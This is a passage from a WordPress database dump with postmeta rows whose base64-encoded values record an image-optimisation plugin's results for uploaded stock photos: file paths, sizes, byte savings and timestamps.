ZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MDUsInRpbWUiOjE0ODM1ODQxMTksImlkIjo3MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjo0MDgsInRpbWUiOjE0ODM1ODQxMjIsImlkIjo3MDR9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My01MTB4NjAwLmpwZyIsIndpZHRoIjo1MTAsImhlaWdodCI6NjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtNTEweDYwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTUxMHg2MDAuanBnIiwicmVkdWN0aW9uIjo4OTEsInRpbWUiOjE0ODM1ODQxMjYsImlkIjo3MDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTExNHgxMzAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0xMTR4MTMwLmpwZyIsIndpZHRoIjoiMTE0IiwiaGVpZ2h0IjoiMTMwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtMTE0eDEzMC5qcGciLCJyZWR1Y3Rpb24iOjM3MCwidGltZSI6MTQ4MzU4NDEyOSwiaWQiOjcwNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtMTgweDE4MC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTE4MHgxODAuanBnIiwid2lkdGgiOiIxODAiLCJoZWlnaHQiOiIxODAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0xODB4MTgwLmpwZyIsInJlZHVjdGlvbiI6MzcyLCJ0aW1lIjoxNDgzNTg0MTMzLCJpZCI6NzA0fSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0yNDd4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtMjQ3eDMwMC5qcGciLCJ3aWR0aCI6IjI0NyIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTI0N3gzMDAuanBnIiwicmVkdWN0aW9uIjo0MzQsInRpbWUiOjE0ODM1ODQxMzYsImlkIjo3MDR9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTMwMHgzMDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My0zMDB4MzAwLmpwZyIsIndpZHRoIjoiMzAwIiwiaGVpZ2h0IjoiMzAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtMzAweDMwMC5qcGciLCJyZWR1Y3Rpb24iOjQzOCwidGltZSI6MTQ4MzU4NDE0MCwiaWQiOjcwNH0seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zODcyMzU5OTMtNDAweDQwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzg3MjM1OTkzLTQwMHg0MDAuanBnIiwid2lkdGgiOiI0MDAiLCJoZWlnaHQiOiI0MDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzM4NzIzNTk5My00MDB4NDAwLmpwZyIsInJlZHVjdGlvbiI6NDUzLCJ0aW1lIjoxNDgzNTg0MTQzLCJpZCI6NzA0fV0='); 
INSERT INTO `wp_postmeta` VALUES (30077, 703, 'wpfc_optimisation_reduction', '9765'); 
INSERT INTO `wp_postmeta` VALUES (30078, 703, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzcuanBnIiwid2lkdGgiOjQyNzIsImhlaWdodCI6Mjg0OCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDE0OCwiaWQiOiI3MDMifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NTY3LCJ0aW1lIjoxNDgzNTg0MTUyLCJpZCI6NzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6ODgyLCJ0aW1lIjoxNDgzNTg0MTU2LCJpZCI6NzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctNzY4eDUxMi5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjUxMiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTc2OHg1MTIuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy03Njh4NTEyLmpwZyIsInJlZHVjdGlvbiI6ODkyLCJ0aW1lIjoxNDgzNTg0MTYwLCJpZCI6NzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoyMjUwLCJ0aW1lIjoxNDgzNTg0MTY1LCJpZCI6NzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMjUweDI1MC5qcGciLCJ3aWR0aCI6MjUwLCJoZWlnaHQiOjI1MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTI1MHgyNTAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0yNTB4MjUwLmpwZyIsInJlZHVjdGlvbiI6NTQyLCJ0aW1lIjoxNDgzNTg0MTY5LCJpZCI6NzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6NDMyLCJ0aW1lIjoxNDgzNTg0MTcyLCJpZCI6NzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTIyNXgyMjUuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0yMjV4MjI1LmpwZyIsInJlZHVjdGlvbiI6NDczLCJ0aW1lIjoxNDgzNTg0MTc1LCJpZCI6NzAzfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctNTEweDYwMC5qcGciLCJ3aWR0aCI6NTEwLCJoZWlnaHQiOjYwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTUxMHg2MDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy01MTB4NjAwLmpwZyIsInJlZHVjdGlvbiI6ODI3LCJ0aW1lIjoxNDgzNTg0MTc5LCJpZCI6NzAzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0xMTR4MTMwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMTE0eDEzMC5qcGciLCJ3aWR0aCI6IjExNCIsImhlaWdodCI6IjEzMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTExNHgxMzAuanBnIiwicmVkdWN0aW9uIjo0MzUsInRpbWUiOjE0ODM1ODQxODMsImlkIjo3MDN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTE4MHgxODAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0xODB4MTgwLmpwZyIsIndpZHRoIjoiMTgwIiwiaGVpZ2h0IjoiMTgwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMTgweDE4MC5qcGciLCJyZWR1Y3Rpb24iOjQ2NSwidGltZSI6MTQ4MzU4NDE4NiwiaWQiOjcwM30seyJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMjQ3eDMwMC5qcGciLCJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTI0N3gzMDAuanBnIiwid2lkdGgiOiIyNDciLCJoZWlnaHQiOiIzMDAiLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0yNDd4MzAwLmpwZyIsInJlZHVjdGlvbiI6NjE1LCJ0aW1lIjoxNDgzNTg0MTkwLCJpZCI6NzAzfSx7InVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy0zMDB4MzAwLmpwZyIsImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctMzAweDMwMC5qcGciLCJ3aWR0aCI6IjMwMCIsImhlaWdodCI6IjMwMCIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTMwMHgzMDAuanBnIiwicmVkdWN0aW9uIjo2MzIsInRpbWUiOjE0ODM1ODQxOTMsImlkIjo3MDN9LHsidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzEzMTY4MzM3LTQwMHg0MDAuanBnIiwiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxMzE2ODMzNy00MDB4NDAwLmpwZyIsIndpZHRoIjoiNDAwIiwiaGVpZ2h0IjoiNDAwIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTMxNjgzMzctNDAweDQwMC5qcGciLCJyZWR1Y3Rpb24iOjc1MywidGltZSI6MTQ4MzU4NDE5NywiaWQiOjcwM31d'); 
INSERT INTO `wp_postmeta` VALUES (30079, 702, 'wpfc_optimisation_reduction', '12919'); 
INSERT INTO `wp_postmeta` VALUES (30080, 702, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUuanBnIiwid2lkdGgiOjUxODQsImhlaWdodCI6MzQ1NiwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU4NDIwMiwiaWQiOiI3MDIifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6NzM2LCJ0aW1lIjoxNDgzNTg0MjA2LCJpZCI6NzAyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtODAweDUzMy5qcGciLCJ3aWR0aCI6ODAwLCJoZWlnaHQiOjUzMywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTgwMHg1MzMuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS04MDB4NTMzLmpwZyIsInJlZHVjdGlvbiI6MTQ0MSwidGltZSI6MTQ4MzU4NDIxMCwiaWQiOjcwMn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjkxMTA2MDU1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yOTExMDYwNTUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjE0MTQsInRpbWUiOjE0ODM1ODQyMTQsImlkIjo3MDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI5MTEwNjA1NS0xNjAweDEwNjcuanBnIiwid2lkdGgiOjE2MDAsImhlaWdodCI6MTA2NywidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dG